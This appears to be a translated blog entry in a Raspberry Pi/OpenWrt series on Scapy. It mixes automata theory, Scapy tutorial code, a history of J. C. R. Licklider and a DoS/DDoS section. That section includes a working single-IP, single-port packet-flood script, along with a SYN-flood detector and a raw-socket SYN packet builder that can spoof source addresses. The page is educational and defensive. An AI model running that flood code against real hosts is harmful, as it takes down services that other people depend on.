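    """Remembers which MACs have claimed each IP and reports a new, different one."""

    def __init__(self):
        self.bindings = defaultdict(set)   # ip -> set of MACs seen claiming it

    def observe(self, mac, ip):
        """Record one claim; return an alert string when `ip` gains a new MAC."""
        known = self.bindings[ip]
        is_new_conflict = bool(known) and mac not in known
        known.add(mac)
        if is_new_conflict:
            return "ALERT: %s now claimed by %s (previously %s)" % (
                ip, mac, ", ".join(sorted(known - {mac})))
        return None


def find_mac_conflicts(lines):
    """Offline pass over saved monitor output: IPs claimed by more than one MAC."""
    table = ArpTable()
    for line in lines:
        parsed = parse_arp_line(line)
        if parsed is not None:
            table.observe(*parsed)
    return {ip: sorted(macs) for ip, macs in table.bindings.items() if len(macs) > 1}


if __name__ == "__main__":
    for ip, macs in sorted(find_mac_conflicts(SAMPLE_LINES).items()):
        print(ip, "->", macs)
```

For live use the same ArpTable.observe() call can sit inside the sniff() callback of the monitor above, fed with pkt[ARP].hwsrc and pkt[ARP].psrc; keeping the detection logic separate from the capture is what makes it testable against saved output like the sample above. A legitimate DHCP re-lease can also move an IP to a new MAC, so treat the alert as a prompt to check, not as proof of an attack.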

 

 

 

 

 

 

 

The World of OpenWrt: Raspberry Pi 3B [Router] Shifting Stars, Turning the Dipper 《4·5》 Scapy 5

If we regard the everyday personal computer as 『computer』 + 『I/O interface』 + 『operator』, then an 『automaton』 (Automata) is like an independently running system that needs no 『operator』. Since the 『Turing test』 has long been debated, what if we map

computer → brain

I/O interface → nervous network

operator → ?

; can 『living things』 then be regarded as 『biochemical-physical automata』?? The great linguist Noam Chomsky held that language is an innate human faculty, unique to humans. From the standpoint of 『evolution』, 『human language』 must then be a 『breakthrough』 mutation of 『biological communication』! Do humans truly have 『souls』? Or are they 『empty in all five aggregates』, with 『no self in persons』 and 『no self in phenomena』?? Should someone say that he hears Tux 『talking』 in his head, he must surely be 『mad』!!

[Image: Tux_Einstein]

If we knew what we were doing, it wouldn’t be called research, would it?

Innovation is not the product of logical thought, even though the final product is tied to a logical structure. ── Einstein

△: 『Big T』 says: the 『gopher』 is already on the verge of 『extinction』, and in today's world the 『spider』 WWW reigns; the fact is:

As our circle of knowledge expands, so does the circumference of darkness surrounding it.

Tux! We shall 『use the barbarian to subdue the barbarian』; let us use the 『first under heaven』 stratagem

《The Thirty-Six Stratagems · Deceive the Heavens to Cross the Sea》

Where preparation is thorough, vigilance slackens; what is often seen is not suspected. The hidden lies within the open, not outside it. Utmost yang, utmost yin.

to build an intelligence 『ㄒㄗ』 network!!

Tux Dashun, Tux Dashun, ㄊ ㄊ ㄊ ㄜ ˋ♬

Once 『sight, sound, smell, taste, touch and thought』 have entered the 『brain』, I fear they are all 『encoded』 『symbols』; even Descartes could only pass it off with 『I think, therefore I am』. So does that 『brain in a vat??』 hear any words or none!!

─── 《TUX@RPI: 《Xianze Code Dispatch》

Could it be that humans ought not to act by 『their own will』 but, 『wound up』 like clockwork, move of their own accord?

Automaton

An automaton (English: Automaton, plural Automata; also called a self-operating machine or self-acting mechanism) is a machine that runs itself without an electrical power supply, using a clockwork mechanism as its source of power. An automaton must first be wound by hand; the mainspring then drives the gears and the linked mechanical parts inside so that it runs by itself. The spring's energy is used up like that of a storage battery, and the mechanism must be wound again. Its working principle differs from that of the engine, the generator, the electric motor and the perpetual motion machine.

Etymology

The word Automaton derives from the Ancient Greek αὐτόματος (automatos), meaning "acting of its own will".

Or is the soul bound to the 『concrete』 and actual, with no mind for 『abstract』 thought!

Automata theory

In theoretical computer science, automata theory is the study of abstract machines and the problems they can solve. It is closely related to formal language theory, because automata are often classified by the class of formal languages they can recognise.

Basic description

An automaton is a mathematical model of a finite-state machine (FSM). An FSM is a machine that, given an input of symbols, "jumps" through a series of states according to a transition function (which can be expressed as a table). In the common "Mealy machine" variant of the FSM, the transition function tells the automaton what the next state is, given the current state and the current symbol.

The input symbols are read one by one until they are exhausted (think of it as a tape with a word written on it, read by the automaton's read head; the head moves forward along the tape, reading one symbol at a time). Once the input is exhausted, the automaton is said to have "halted".

Depending on the state in which the automaton halts, it is said either to "accept" or to "reject" the input. If it halts in an "accepting state", the automaton "accepts" the word; if it halts in a "rejecting state", the word is "rejected". The set of all words accepted by an automaton is called "the language accepted by this automaton".

Note, however, that an automaton need not have a finite, or even a countable, number of states. For example, a quantum finite automaton has uncountably infinitely many states, because the set of all possible states is the set of all points in a complex projective space. Thus quantum finite automata, like finite-state machines, are special cases of the more general idea of a topological automaton, whose set of states is a topological space and whose state transition function is drawn from all possible functions on that space. Topological automata are often called M-automata; they are simply semiautomata supplemented with a set of accepting states, where set intersection determines whether the initial state is accepted or rejected.

In general, an automaton need not strictly accept or reject an input; it may accept it with some probability between zero and one. Again taking the quantum finite automaton as the example, it accepts an input only with some probability. This idea is in turn a special case of the more general geometric automaton or metric automaton, whose set of states is a metric space and which accepts a language if the distance, in that metric, between the initial point and the set of accepting states is sufficiently small.

Hence a few words on the 『view of tools』:

Automata

Scapy makes it easy to create network automata. Scapy does not stick to a specific model like Moore or Mealy automata; it gives you a flexible way to choose your own approach.

An automaton in Scapy is deterministic. It has different states. A start state and some end and error states. There are transitions from one state to another. Transitions can be transitions on a specific condition, transitions on the reception of a specific packet or transitions on a timeout. When a transition is taken, one or more actions can be run. An action can be bound to many transitions. Parameters can be passed from states to transitions and from transitions to states and actions.

From a programmer’s point of view, states, transitions and actions are methods from an Automaton subclass. They are decorated to provide meta-information needed in order for the automaton to work.

First example

Let’s begin with a simple example. I take the convention to write states with capitals, but anything valid with Python syntax would work as well.

from scapy.all import Automaton, ATMT

class HelloWorld(Automaton):
    @ATMT.state(initial=1)
    def BEGIN(self):
        print("State=BEGIN")

    @ATMT.condition(BEGIN)
    def wait_for_nothing(self):
        print("Wait for nothing...")
        raise self.END()

    @ATMT.action(wait_for_nothing)
    def on_nothing(self):
        print("Action on 'nothing' condition")

    @ATMT.state(final=1)
    def END(self):
        print("State=END")

In this example, we can see 3 decorators:

  • ATMT.state, which is used to indicate that a method is a state, and which can have the optional arguments initial, final and error set to non-zero for special states.
  • ATMT.condition, which indicates a method to be run when the automaton reaches the indicated state. The argument is the name of the method representing that state.
  • ATMT.action, which binds a method to a transition and is run when the transition is taken.

Running this example gives the following result:

>>> a=HelloWorld()
>>> a.run()
State=BEGIN
Wait for nothing...
Action on 'nothing' condition
State=END

This simple automaton can be described with the following graph:

_images/ATMT_HelloWorld.png

The graph can be automatically drawn from the code with:

>>> HelloWorld.graph()
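The description above lists what a Scapy automaton is made of: a start state, final and error states, transitions taken on a condition, on a matching packet or on a timeout, and actions bound to transitions. As an added example, not Scapy code and not Scapy's Automaton API, the pure-Python engine below implements exactly that model and drives it with the client side of a TCP three-way handshake, where a SYN/ACK leads to ESTABLISHED, a RST or a timeout leads to ERROR, and an unexpected packet is simply ignored. Packets are constructed dicts carrying only a "flags" string; the class Automaton and the function tcp_client_handshake are my own names.

```python
class Automaton:
    """Minimal deterministic automaton: named states (one initial, some final,
    some error), transitions guarded by a condition, a packet match or a
    timeout, and an optional action run when a transition is taken."""

    def __init__(self, initial, final=(), error=()):
        self.initial = initial
        self.final = set(final)
        self.error = set(error)
        self.transitions = []      # (src, guard, dst, action, needs_input)
        self.state = initial
        self.trace = []            # (src, dst) pairs in the order taken

    def on_condition(self, src, guard, dst, action=None):
        """Spontaneous transition: checked as soon as `src` is reached."""
        self.transitions.append((src, guard, dst, action, False))

    def on_packet(self, src, match, dst, action=None):
        """Transition taken when a received packet satisfies `match`."""
        self.transitions.append(
            (src, lambda pkt: pkt is not None and match(pkt), dst, action, True))

    def on_timeout(self, src, dst, action=None):
        """Transition taken when the receive timer expires (input item None)."""
        self.transitions.append((src, lambda pkt: pkt is None, dst, action, True))

    def done(self):
        return self.state in self.final or self.state in self.error

    def _fire(self, needs_input, pkt=None):
        # Deterministic: the first registered transition whose guard holds wins.
        for src, guard, dst, action, needs in self.transitions:
            if needs == needs_input and src == self.state and guard(pkt):
                if action is not None:
                    action(pkt)
                self.trace.append((src, dst))
                self.state = dst
                return True
        return False

    def _settle(self):
        # Follow spontaneous transitions until none applies or a terminal state is reached.
        while not self.done() and self._fire(False):
            pass

    def run(self, inputs):
        """Drive the automaton with received packets (dicts) and timeouts (None)."""
        self.state, self.trace = self.initial, []
        self._settle()
        for pkt in inputs:
            if self.done():
                break
            self._fire(True, pkt)      # an input nobody matches is dropped
            self._settle()
        return self.state


def tcp_client_handshake():
    """Client side of a TCP three-way handshake as an automaton.
    Returns the automaton and the list its actions append to."""
    log = []
    a = Automaton("CLOSED", final=["ESTABLISHED"], error=["ERROR"])
    a.on_condition("CLOSED", lambda pkt: True, "SYN_SENT",
                   lambda pkt: log.append("send SYN"))
    a.on_packet("SYN_SENT", lambda p: p.get("flags") == "SA", "ESTABLISHED",
                lambda pkt: log.append("send ACK"))
    a.on_packet("SYN_SENT", lambda p: "R" in p.get("flags", ""), "ERROR",
                lambda pkt: log.append("connection refused"))
    a.on_timeout("SYN_SENT", "ERROR",
                 lambda pkt: log.append("timeout waiting for SYN/ACK"))
    return a, log


if __name__ == "__main__":
    a, log = tcp_client_handshake()
    print(a.run([{"flags": "SA"}]), log)    # ESTABLISHED
    a, log = tcp_client_handshake()
    print(a.run([None]), log)               # ERROR (timeout)
```

The timeout is modelled as an explicit None item in the input stream so the whole run is reproducible offline; a live version would produce that None from a receive deadline. Keeping the transition table data rather than code is also what lets a tool like Scapy draw the state graph automatically, as HelloWorld.graph() does above.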

※ Reference:

I am glad to introduce, from 『pyladies』

ipython-scapy

ipython-scapy/Extra.md

In absolutely no particular order of anything:

Tutorial Resources

Extra Scapy resources

Other tools

  • tcpdump – command-line packet analyzer
  • Metasploit Database – well-kept/well-known database of known vulnerabilities (e.g. CVEs) & exploits

Good to keep handy

the notes and documents they compiled☆

The World of OpenWrt: Raspberry Pi 3B [Router] Shifting Stars, Turning the Dipper 《4·5》 Scapy 4 · The Force Awakens

At that time the far shore of the sea was in its 『pioneering』 age, and Johnny Chapman, born in 1774, wrote the legend of 『Appleseed』

[Image: Johnny Appleseed]

Appleseed

What can one see in an 『apple seed』? The resilience of life? The joy of breaking through the soil? Or the one Eve stole a bite of? Perhaps one can put it this way: mastery of 『 』 changed human life at the time, and a seed passed down through the generations shapes those who carry the 『pioneer spirit』 that Johnny Appleseed represents ──

STAR TREK
Where No One Has Gone Before

──; will it in the end become a 『conceptual seed』 awaiting its moment to 『sprout』?

On 4 July 1776 the Continental Congress adopted the Declaration of Independence, declaring the new nation independent and wholly separate from Britain, with the aim of 『life, liberty and the pursuit of happiness』 and of realising the ideals of the Enlightenment. One hundred and thirty-nine years later, on 11 March 1915, Joseph Carl Robnett Licklider was born in St. Louis, Missouri; who knows how far that is from the St. Petersburg, Missouri, of Mark Twain's Adventures of Tom Sawyer? The only son of a Baptist minister, he loved building model aeroplanes as a boy, showed an engineering talent and remained a lifelong tinkerer with cars; history calls him the 『seed of computing』.

[Images: J. C. R. Licklider; SAGE console; Xerox Alto with computer; Xerox 8010 compound document; evolution of the document icon shape; Rank Xerox 8010+40 brochure front]

In 1937 Lick, aged twenty-two, received a bachelor of arts from Washington University, majoring in physics, mathematics and psychology; in 1942 he took a doctorate in psychoacoustics at the University of Rochester; from 1943 to 1950 he worked at Harvard's Psycho-Acoustic Laboratory, where he became interested in 『information technology』, and then went to MIT as an associate professor, joined the MIT Lincoln Laboratory committee and promoted the establishment of a psychology curriculum for engineering students. This was the era of the US-Soviet 『Cold War』, and Lick took part in the 『SAGE』 ── Semi-Automatic Ground Environment ── project (see the second figure at left). In 1957 he received the Franklin V. Taylor Award, the highest honour of the Society of Engineering Psychologists; the same year he became vice-president of the high-tech firm Beranek and Newman, where, using the first-generation PDP-1 computer he had purchased, he led the public to understand the concept of 『time-sharing』; the following year he was elected president of the Acoustical Society of America. In October 1962 Lick was appointed by the US Defense Advanced Research Projects Agency, DARPA ── later called ARPA ──, to head the Information Processing Techniques Office (IPTO); in 1963 he moved to head ARPA's Behavioral Sciences Command & Control Research office, and in a memorandum to his colleagues titled 『Members and Affiliates of the Intergalactic Computer Network』:
imagined as an electronic commons open to all, ‘the main and essential medium of informational interaction for governments, institutions, corporations, and individuals.’

he proclaimed the vision of an 『Intergalactic Network』, the first thunderclap of spring that brought the Internet into being!! In 1968 Lick became a professor in MIT's electrical engineering department and led Project MAC ── Mathematics And Computation ──, which built the first time-sharing computing system, … whose inspiration encouraged …… the development of Unix ………. Or perhaps Robert Taylor ── founder of the Xerox PARC Computer Science Laboratory and the DEC Systems Research Center ── put it best:
most of the significant advances in computer technology—including the work that my group did at Xerox PARC—were simply extrapolations of Lick’s vision. They were not really new visions of their own. So he was really the father of it all

─── 《A Flight of Fancy!!

Who knows whether Lick foresaw that the 『Intergalactic Network』 would give rise to 『online street protest』☆

Denial-of-service attack

A denial-of-service attack (DoS attack), also called a flood attack, is a network attack technique whose aim is to exhaust the network system resources of the target computer so that its service is temporarily interrupted or stopped and its legitimate users cannot access it.

When an attacker uses two or more compromised computers on the network as 『zombies』 to launch a 『denial-of-service』 attack against a specific target, it is called a distributed denial-of-service attack (DDoS attack). According to 2014 statistics, confirmed large-scale DDoS attacks averaged 28 per hour.[1] DDoS initiators generally target important services and well-known websites, such as banks, credit card payment gateways and even the root name servers.

DoS is also common in some online games, widely used by disgruntled players or by competitors. DoS is also often used for protest; Richard Stallman, founder of the Free Software Foundation, has said that DoS is a form of 『online street protest』.[2]

當一種『攻擊』成為常態,人們不得不了解它的『機制』,尋求『防禦』方法★

DoS & DDoS attack

In this chapter, we will learn about the DoS and DdoS attack and understand how to detect them.

With the boom in e-commerce, web servers are exposed to attack and are easy targets for attackers. Attackers usually attempt two types of attack −

  • DoS (Denial of Service)
  • DDoS (Distributed Denial of Service)

DoS (Denial-of-Service) Attack

A Denial of Service (DoS) attack is an attempt by an attacker to make a network resource unavailable. It usually interrupts, temporarily or indefinitely, a host connected to the Internet. These attacks typically target services hosted on mission-critical web servers such as banks and credit card payment gateways.

Symptoms of DoS attack

  • Unusually slow network performance.
  • Unavailability of a particular web site.
  • Inability to access any web site.
  • Dramatic increase in the number of spam emails received.
  • Long-term denial of access to the web or any Internet services.

Types of DoS Attack & its Python Implementation

A DoS attack can be mounted at the data link, network or application layer. Let us now look at the different types of DoS attack and their implementation in Python −

Single IP single port

A large number of packets are sent to the web server from a single source IP and a single source port. It is a low-level attack, used mainly to observe how the web server behaves under load; it is also the easiest to stop, since one filter on the source address and port blocks it. It can be implemented in Python with the help of Scapy (sending crafted packets requires root privileges). The following Python script implements a single IP, single port DoS attack −

from scapy.all import *   # Scapy builds the IP/TCP layers and sends them

source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1

while True:
   # Scapy's field names are src/dst on IP and sport/dport on TCP
   IP1 = IP(src = source_IP, dst = target_IP)
   TCP1 = TCP(sport = source_port, dport = 80)
   pkt = IP1 / TCP1
   send(pkt, inter = .001)   # one packet per millisecond, until interrupted

   print ("packet sent ", i)
   i = i + 1

……

DDoS (Distributed Denial-of-Service) Attack

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service or a website unavailable by overloading it with huge floods of traffic generated from multiple sources.

Unlike a Denial of Service (DoS) attack, in which one computer and one Internet connection are used to flood a targeted resource with packets, a DDoS attack uses many computers and many Internet connections, often distributed globally in what is referred to as a botnet. A large-scale volumetric DDoS attack can generate traffic measured in tens of gigabits (and even hundreds of gigabits) per second. It can be read about in detail at https://www.tutorialspoint.com/ethical_hacking/ethical_hacking_ddos_attacks.htm.

Detection of DDoS using Python

A DDoS attack is harder to detect, because you cannot tell whether the host sending the traffic is spoofed or real. The Python script given below helps detect a DDoS attack.

───
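As an added example (not the detection script from the tutorial quoted above, which is not reproduced on this page), the following pure-Python detector applies the usual first-line heuristic: count TCP SYNs per source address and in aggregate over a sliding window, so that a single flooding host trips the per-source limit, while a botnet whose members each send only a little traffic still trips the aggregate limit. The thresholds and the packet log are constructed assumptions; in practice the records would come from scapy.sniff() or a flow export.

```python
"""Sliding-window SYN-flood detector over a packet log (added example).

Works on constructed records so it runs offline; a real deployment would call
feed() from scapy.sniff(prn=...) or a flow exporter instead.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 1.0     # assumption: one-second sliding window
PER_SOURCE_LIMIT = 50    # assumption: > 50 SYNs/s from one address is a flood
AGGREGATE_LIMIT = 400    # assumption: > 400 SYNs/s in total is a (D)DoS


class SynFloodDetector:
    """Tracks half-open connection attempts (SYN without ACK) per source and overall."""

    def __init__(self, window=WINDOW_SECONDS,
                 per_source=PER_SOURCE_LIMIT, aggregate=AGGREGATE_LIMIT):
        self.window = window
        self.per_source = per_source
        self.aggregate = aggregate
        self.by_src = defaultdict(deque)   # src ip -> timestamps of its SYNs
        self.all_syn = deque()             # timestamps of every SYN seen
        self.alerts = []                   # (ts, kind, src, count)

    def _expire(self, dq, now):
        # drop timestamps that have fallen out of the window
        while dq and now - dq[0] > self.window:
            dq.popleft()

    def feed(self, ts, src, dport, flags):
        """Consume one (ts, src, dport, flags) record; return an alert or None.

        Only pure SYNs count: a SYN-ACK or ACK belongs to a handshake that is
        completing, which is exactly what a spoofed-source flood never does.
        """
        if flags != "S":
            return None
        dq = self.by_src[src]
        dq.append(ts)
        self._expire(dq, ts)
        self.all_syn.append(ts)
        self._expire(self.all_syn, ts)

        alert = None
        if len(dq) > self.per_source:
            alert = ("single-source", src, len(dq))
        elif len(self.all_syn) > self.aggregate:
            # no single address is loud, but the total is: distributed flood
            alert = ("distributed", None, len(self.all_syn))
        if alert:
            self.alerts.append((ts,) + alert)
        return alert


def analyze(records):
    """Run the detector over records in time order and return, per alert kind,
    the first (ts, src, count) that triggered it."""
    det = SynFloodDetector()
    for rec in sorted(records):
        det.feed(*rec)
    first = {}
    for ts, kind, src, count in det.alerts:
        first.setdefault(kind, (ts, src, count))
    return first


def constructed_traffic():
    """Constructed packet log (not captured data) in three phases."""
    recs = []
    # 0-10 s: benign clients completing handshakes, ~20 SYNs/s from 20 hosts
    for i in range(200):
        ip = "192.0.2.%d" % (i % 20 + 1)
        recs.append((i * 0.05, ip, 80, "S"))
        recs.append((i * 0.05 + 0.01, ip, 80, "A"))
    # 10-10.5 s: single IP, single port flood (the attack scripted above)
    for i in range(200):
        recs.append((10.0 + i * 0.0025, "10.0.0.5", 80, "S"))
    # 20-20.5 s: 500 bots, one SYN each, every one below the per-source limit
    for i in range(500):
        ip = "198.51.100.%d" % (i + 1) if i < 250 else "203.0.113.%d" % (i - 249)
        recs.append((20.0 + i * 0.001, ip, 80, "S"))
    return recs


if __name__ == "__main__":
    for kind, (ts, src, n) in analyze(constructed_traffic()).items():
        print("%-13s first seen at t=%.3fs src=%s count=%d" % (kind, ts, src, n))
```

The per-source check runs first, so a loud single host is reported as such even when it also pushes the aggregate over the limit; the aggregate check is what catches the botnet phase, where no address ever exceeds a handful of SYNs. Counting only SYNs that are never followed by the peer's ACK is the same signal the kernel's SYN cookies react to, which is why this heuristic is cheap but also why a flood of full connections from real hosts (an application-layer DDoS) needs a different detector.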

 

《駭客大全》 (the Hacker's Compendium) says:

The strength of "attack" and "defence" is driven by the energy of the "mind", just like wielding a

Lightsaber

A lightsaber[1] (English: lightsaber) is a weapon of pivotal importance in the Star Wars universe, seen frequently in Star Wars films, novels and games. In the Star Wars setting, the concept of the lightsaber is that the traditional metal blade is replaced by some substance existing as pure energy, which can be condensed into a blade about a metre long that glows in a particular colour. As to what this energy actually is, perhaps because of mistaken publicity in some media, people sometimes simply take the substance forming the blade to be a laser or other light beam, which raises questions about whether a lightsaber violates the laws of physics[2]; but in fact nowhere in Star Wars is there evidence that the blade is made of light,[3] although the "energy" explanation is very vague. One explanation is that this energy is a mass of plasma, confined into the shape of a blade by a strong magnetic field (or some other kind of field). The blade is projected from the metal hilt behind it; the hilt is generally about twenty to thirty centimetres long and can be designed in a particular style to suit the user's needs. The lightsaber makes a distinctive sound when switched on and off and when swung.

"This is the weapon of a Jedi Knight. Not as clumsy or random as a blaster. An elegant weapon for a more civilized age."

Obi-Wan Kenobi, Star Wars Episode IV: A New Hope

 

, and it remains an "art" to this day ☺

The Art of Packet Crafting with Scapy

Workshop overview

  • This is an intense workshop on crafting packets using Python and Scapy.
  • We’ll look at low-level networking details and abstractions such as raw sockets, then move on to high-level tools like Scapy to craft packets.
  • We’ll understand Scapy framework and craft packets using it.
  • We’ll leverage Scapy as a framework to build custom network tools/utilities.

Concepts covered

  • Practical network reconnaissance techniques like host discovery, service discovery, remote OS fingerprinting and promiscuous node detection using Scapy.
  • Launching Layer 2 attacks.
  • Leveraging Scapy to build custom tools/utilities such as sniffers, pcap analyzers, wireless sniffers and scanners.

Skill prerequisites

  • Basics of Python programming (strings, lists, functions, list comprehensions etc.).
  • Knowledge of basic networking concepts (enough to know what an IP address, a port number and the OSI model are).
  • Comfort with basic operations on your host operating system (copying files, using a text editor).
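To make the "raw sockets first, then Scapy" progression of the workshop concrete, here is an added example (not material from the workshop or its authors) that hand-assembles an IPv4/TCP SYN with struct, computes the RFC 1071 checksums including the TCP pseudo-header, and parses the bytes back to verify them. This is the work Scapy's IP()/TCP() layers do behind IP(src=..., dst=...)/TCP(sport=..., dport=...) in the script earlier on this page. The addresses and ports are illustrative assumptions from the documentation ranges, and injecting via a raw socket needs CAP_NET_RAW, so the send helper is shown but not invoked.

```python
"""Hand-crafted IPv4/TCP SYN with checksums, plus a parser (added example)."""
import socket
import struct

IPV4_FMT = "!BBHHHBBH4s4s"   # ver/ihl, tos, len, id, flags/frag, ttl, proto, csum, src, dst
TCP_FMT = "!HHIIHHHH"         # sport, dport, seq, ack, off/flags, window, csum, urgptr
PSEUDO_FMT = "!4s4sBBH"       # src, dst, zero, proto, tcp length
TCP_SYN = 0x02


def inet_checksum(data: bytes) -> int:
    """RFC 1071: one's complement of the one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp_syn(src: str, dst: str, sport: int, dport: int,
                  seq: int = 0, window: int = 8192) -> bytes:
    """20-byte TCP header with only SYN set; the checksum also covers the pseudo-header."""
    off_flags = (5 << 12) | TCP_SYN          # data offset 5 words, flags = SYN
    hdr = struct.pack(TCP_FMT, sport, dport, seq, 0, off_flags, window, 0, 0)
    pseudo = struct.pack(PSEUDO_FMT, socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(hdr))
    csum = inet_checksum(pseudo + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def build_ipv4(src: str, dst: str, payload: bytes, ttl: int = 64,
               ident: int = 0x1234, proto: int = socket.IPPROTO_TCP) -> bytes:
    """IPv4 header (no options, DF set) in front of payload; checksum covers the header only."""
    hdr = struct.pack(IPV4_FMT, (4 << 4) | 5, 0, 20 + len(payload), ident, 0x4000,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    csum = inet_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + payload


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Decode the fields and verify both checksums: summing a header that already
    carries its checksum gives 0xFFFF, so inet_checksum() over it returns 0."""
    ihl = (pkt[0] & 0x0F) * 4
    ip = struct.unpack(IPV4_FMT, pkt[:20])
    tcp = struct.unpack(TCP_FMT, pkt[ihl:ihl + 20])
    pseudo = struct.pack(PSEUDO_FMT, ip[8], ip[9], 0, ip[6], len(pkt) - ihl)
    return {
        "src": socket.inet_ntoa(ip[8]), "dst": socket.inet_ntoa(ip[9]),
        "ttl": ip[5], "proto": ip[6], "total_len": ip[2],
        "sport": tcp[0], "dport": tcp[1], "seq": tcp[2], "flags": tcp[4] & 0x1FF,
        "ip_checksum_ok": inet_checksum(pkt[:ihl]) == 0,
        "tcp_checksum_ok": inet_checksum(pseudo + pkt[ihl:]) == 0,
    }


def send_raw(pkt: bytes, dst: str) -> None:
    """Inject the finished datagram. On Linux IPPROTO_RAW implies IP_HDRINCL, so the
    kernel sends our header as-is; this needs CAP_NET_RAW and is not run here."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(pkt, (dst, 0))


if __name__ == "__main__":
    # illustrative addresses from the documentation ranges (assumption)
    seg = build_tcp_syn("192.0.2.1", "198.51.100.7", 40000, 80, seq=1)
    pkt = build_ipv4("192.0.2.1", "198.51.100.7", seg)
    print(pkt.hex())
    print(parse_ipv4_tcp(pkt))
```

Two details matter when crafting by hand and are easy to get wrong: the TCP checksum must be computed over a pseudo-header that borrows the IP addresses (so a spoofed source changes the TCP checksum too), and the IP checksum covers only the IP header, which is why routers can rewrite TTL and recompute it without touching the segment. Scapy hides both by filling in the chksum fields at send time; if you set chksum yourself it keeps your value, which is how deliberately bad checksums are produced for testing a target's parser.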